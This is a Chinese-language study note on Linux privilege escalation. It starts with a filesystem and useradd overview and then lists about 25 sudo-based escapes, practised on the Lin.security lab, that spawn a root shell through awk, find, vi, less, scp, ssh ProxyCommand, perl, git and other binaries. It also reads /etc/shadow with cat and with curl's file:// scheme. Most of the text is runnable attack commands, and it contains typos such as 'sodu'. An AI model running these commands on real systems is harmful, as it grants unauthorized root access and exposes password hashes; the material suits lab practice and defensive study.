liunx提权姿势
liun文件系统
bin# 普通用户使用命令存放
sbin# 管理员用户使用命令存放
dev# 设备文件、挂载硬盘设备等(银行等挂载磁带机)。
dev/null# 垃圾站
root#管理员操作存放目录
home# 普通用户操作存放目录
proc# 虚拟文件系统、内核信息
usr# 系统文件
/usr/local# 软件安装目录(大部分)
/usr/bin 软件安装后普通用户命令
/usr/sbin软件安装后管理员用户命令
.dll# windows 动态链接库
.so# liunx 动态链接库
/usr/lib库文件放在这
/usr/lib64
boot#系统启动相关文件(不要乱删)
etc# 软件配置文件
cat /etc/passwd# 查看Liunx用户信息
cat /etc/shadow# 查看Liunx用户密码信息
tmp#临时文件
var#存储变化得文件(数据库等)
media#移动设备挂载
mnt#手动挂载文件
useradd#添加用户
-u#指定uid
-g#指定gid
-c#指定注释信息
-d#指定家目录
-s#指定使用什么shell (/bin/bash#大多数使用)
-G#附加组
提权演示:
sudo#提权
sudo su #提升至root权限
sudo -l# 当前用户能使用什么权限。
vi /etc/sudoers# 编辑sudooers文件调整其他用户权限
自行寻找靶场#我这里使用Lin.security这个别人给的
ssh连接后查看当前状态
1、ash
sudo ash
提权成功。
2、awk(文本分析工具)
sudo awk 'BEGIN {system("/bin/sh")}'
3、bash(liunx默认执行shell)
sudo bash
4、csh(sh类型shell)
sudo csh
5、curl(浏览器伪协议)
sudo curl file:///etc/shadow
读取到root目录下shadow文件。
6、dash(原bin.sh链接用途。dash体积小。(有概率成功))
sudo dash
7、ed(文本编辑器:一次一行)
sudo ed
!/bin/sh
ctrl+z结束
8、env(环境变量)
sudo env /bin/sh
9、expect(自动化交互套件)
sudo expect -c 'spawn /bin/sh;interact'
10、find(发现文件)
sudo find . -exec /bin/sh \;
-quit
11、ftp(文件传输)
sudo ftp
!/bin/sh
12、less
sudo less /etc/passwd
!/bin/sh
13、more
sudo more /etc/passwd
!/bin/sh
同上
14、man(查看介绍)
sudo man man
!/bin/sh
15、scp(liunx之间复制文件)
使用ssh是加密的,rcp不加密
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
16、socat(natcat加强版,测试用软件)
sudo socat stdin exec:/bin/sh
17、ssh(传输)(ssh守护进程sshd)
sudo ssh -o ProxyCommand='; sh 0<&2 1>&2' x
18、zsh(shell得一种。高级版bash)
sudo zsh
19、vi
sudo vi -c ':!/bin/sh' /dev/null
20、rvim(高级vim, 程序员用编辑文本。同vi) (失败。!)
但是需要python环境编译
sudo rvim -c ':python3 import os;os.execl("/bin/sh","sh","-c","reset; exec sh")'
21、perl(一种环境语言。)
sodu perl -e 'exec "/bin/sh";'
22、tclsh(脚本语言,基于字符串命令语言。对每条语句进行解释、执行。)
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
23、git(代码管理工具)
sudo git -p help config
!/bin/sh
24、script
(开源把终端的会话录制下来,使用scriptreplay把录制结果播放给别人看)
sudo script -q /dev/null
25、taskset(设置进程或线程绑定在cpu执行。)
taskset 1 /bin/sh -p
。